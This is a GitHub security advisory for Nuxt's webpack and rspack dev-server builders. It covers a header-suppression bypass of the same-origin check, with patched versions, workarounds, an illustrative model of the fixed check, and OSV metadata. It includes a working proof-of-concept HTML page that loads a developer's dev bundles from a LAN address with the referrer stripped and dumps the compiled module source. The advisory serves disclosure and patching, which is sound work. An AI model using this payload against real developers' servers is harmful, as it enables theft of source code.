GHSA-X6QJ-4H56-5RJ5

Vulnerability from github – Published: 2026-06-16 23:39 – Updated: 2026-06-16 23:39
Summary
@nuxt/webpack-builder and @nuxt/rspack-builder dev server same-origin check bypassed when Sec-Fetch-Site, Origin, and Referer are all absent (incomplete fix for GHSA-6m52-m754-pw2g)
Details

Summary

This is an incomplete fix for GHSA-6m52-m754-pw2g. Source code may still be stolen during dev when using the webpack / rspack builder if the dev server is bound to a non-loopback address (e.g. nuxt dev --host) and the developer opens a malicious site on the same network.

Details

The fix for GHSA-6m52-m754-pw2g added an Origin / Referer fallback to the dev-middleware same-origin check, with a return true branch when neither header is present so that non-browser clients (curl, the HMR client, address-bar navigation) keep working.

That fallback is bypassed when a cross-origin attacker request reaches the dev server with all three signal headers absent:

  • Sec-Fetch-Site is not sent by browsers to non-potentially-trustworthy destinations (HTTP on a non-loopback address).
  • Origin is not sent on non-CORS subresource fetches (a bare <script> with no crossorigin).
  • Referer can be suppressed by the attacker page with <meta name="referrer" content="no-referrer"> or referrerpolicy="no-referrer" on the <script> element.

A classic <script src="http://VICTIM_LAN_IP:3000/_nuxt/app.js" referrerpolicy="no-referrer"> from a non-trustworthy attacker origin produces exactly that header set, the request is allowed, and the attacker page can read the built source out of window.webpackChunk* via Function.prototype.toString().

Since the attack requires the dev server to be reachable via a non-potentially-trustworthy origin, only apps using --host (or --host 0.0.0.0) are affected. Chrome 142+ users are also protected by Local Network Access restrictions.

PoC

  1. Create a Nuxt project with the webpack / rspack builder.
  2. Run npm run dev -- --host 0.0.0.0.
  3. Open http://localhost:3000 on the developer machine.
  4. From a different LAN host, serve the page below and open it in the same browser.
  5. The compiled module source is exfiltrable from window.webpackChunknuxt_<projectname>.
<!doctype html>
<meta name="referrer" content="no-referrer">
<script>
  ['/_nuxt/runtime.js', '/_nuxt/app.js'].forEach(p => {
    const s = document.createElement('script')
    s.src = 'http://VICTIM_LAN_IP:3000' + p
    s.referrerPolicy = 'no-referrer'
    document.head.appendChild(s)
  })
  setTimeout(() => {
    const key = Object.keys(window).find(k => k.startsWith('webpackChunk'))
    for (const [, mods] of window[key]) {
      for (const id in mods) {
        console.log(id, mods[id].toString())
      }
    }
  }, 1500)
</script>

Impact

Developers running the webpack / rspack builder with nuxt dev --host may have the built source code read by malicious websites on the same network, including module identifiers, the developer's local filesystem path, and any developer-controlled strings inlined into the bundle.

This vulnerability does not affect users of Chrome 142+ (and other Chromium-based browsers) due to Local Network Access restrictions.

The default Vite builder is not affected.

Patches

Fixed in @nuxt/webpack-builder@4.4.7 / @nuxt/rspack-builder@4.4.7 and backported to @nuxt/webpack-builder@3.21.7 / @nuxt/rspack-builder@3.21.7 by #35200 (4.x: commit e351de94; 3.x: commit 77187ee4). The dev-middleware same-origin check now treats a request with no Sec-Fetch-Site, no Origin, and no Referer as same-origin only when the dev server is loopback-bound, closing the header-suppression bypass.

The fix only ships for the @nuxt/webpack-builder and @nuxt/rspack-builder packages. The default Vite builder was not affected.
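The same-origin gate described under Details, together with the loopback-only rule from Patches, modelled as an added example (this is not the Nuxt project's own code): checkDevRequest, the accepted Sec-Fetch-Site values, the option names and the sample requests are assumptions, and allowHeaderlessAnywhere reproduces the pre-fix return true branch so the two behaviours can be compared side by side.

```javascript
// Illustrative dev-server same-origin check (added example, not Nuxt code).
// A request carrying none of Sec-Fetch-Site, Origin or Referer is trusted
// only when the dev server is bound to loopback, as the advisory's fix does.

function hostOf(value) {
  // Extract "host:port" from an Origin or Referer value; null if unparsable.
  try { return new URL(value).host } catch { return null }
}

// headers: plain object with lower-case header names (constructed input).
// opts.loopbackBound: true when the server listens on 127.0.0.1 / ::1 only.
// opts.allowHeaderlessAnywhere: true models the pre-fix `return true` branch.
function checkDevRequest(headers, opts) {
  const site = headers['sec-fetch-site']
  if (site !== undefined) {
    // Assumption: Fetch Metadata marks same-origin and address-bar ("none")
    // requests; any other value is treated as cross-site and refused.
    return site === 'same-origin' || site === 'none'
  }
  const source = headers.origin ?? headers.referer
  if (source !== undefined) {
    // Fallback: the initiating host must match the Host the request hit.
    return hostOf(source) === headers.host
  }
  // All three signals absent: curl, the HMR client, or the advisory's
  // referrer-suppressed <script> fetch. Only loopback binding makes it safe.
  return opts.allowHeaderlessAnywhere ? true : opts.loopbackBound
}

// Constructed sample requests (RFC 5737 documentation addresses).
const headerlessFromLan = { host: '192.0.2.10:3000' }
const curlOnLoopback = { host: 'localhost:3000' }
const crossOriginWithReferer = { host: '192.0.2.10:3000', referer: 'http://192.0.2.77:8080/page.html' }
const sameOriginBrowser = { host: 'localhost:3000', 'sec-fetch-site': 'same-origin' }

const preFix = { loopbackBound: false, allowHeaderlessAnywhere: true }
const postFixOnHost = { loopbackBound: false, allowHeaderlessAnywhere: false }
const postFixOnLoopback = { loopbackBound: true, allowHeaderlessAnywhere: false }

function demo() {
  return {
    preFixHeaderless: checkDevRequest(headerlessFromLan, preFix),          // true: bypass
    postFixHeaderless: checkDevRequest(headerlessFromLan, postFixOnHost),  // false: closed
    curlLoopback: checkDevRequest(curlOnLoopback, postFixOnLoopback),      // true: still works
    crossOriginReferer: checkDevRequest(crossOriginWithReferer, postFixOnHost), // false
    sameOrigin: checkDevRequest(sameOriginBrowser, postFixOnLoopback),     // true
  }
}
console.log(demo())
```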

Workarounds

If you cannot upgrade immediately:

  • Don't use nuxt dev --host. Bind the dev server to localhost (the default) and tunnel from other devices via SSH or a reverse proxy that enforces same-origin checks.
  • Use Chrome 142+ or another Chromium-based browser that enforces Local Network Access restrictions.
  • Switch to the Vite builder for development.

Credit

Reported by Berkan SAL (@Uhudsavasindankacanokcu2) via the Vercel Open Source HackerOne program.

Independently reported by @DavidCarliez via GitHub's coordinated disclosure flow (GHSA-xw96-2f5x-v9pv), closed as a duplicate of this advisory.


{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@nuxt/webpack-builder"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0"
            },
            {
              "fixed": "4.4.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@nuxt/webpack-builder"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.15.4"
            },
            {
              "fixed": "3.21.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@nuxt/rspack-builder"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0"
            },
            {
              "fixed": "4.4.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@nuxt/rspack-builder"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.15.4"
            },
            {
              "fixed": "3.21.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-49993"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-749"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-16T23:39:16Z",
    "nvd_published_at": "2026-06-12T14:16:32Z",
    "severity": "MODERATE"
  },
  "id": "GHSA-x6qj-4h56-5rj5",
  "modified": "2026-06-16T23:39:17Z",
  "published": "2026-06-16T23:39:16Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nuxt/nuxt/security/advisories/GHSA-6m52-m754-pw2g"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nuxt/nuxt/security/advisories/GHSA-x6qj-4h56-5rj5"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-49993"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nuxt/nuxt/pull/35200"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nuxt/nuxt/commit/77187ee4015e9267fb464951542a3e09e8b5fa05"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nuxt/nuxt/commit/e351de943e82db16970618b60dc7fdbaa58630f3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nuxt/nuxt"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "@nuxt/webpack-builder and @nuxt/rspack-builder dev server same-origin check bypassed when Sec-Fetch-Site, Origin, and Referer are all absent (incomplete fix for GHSA-6m52-m754-pw2g)"
}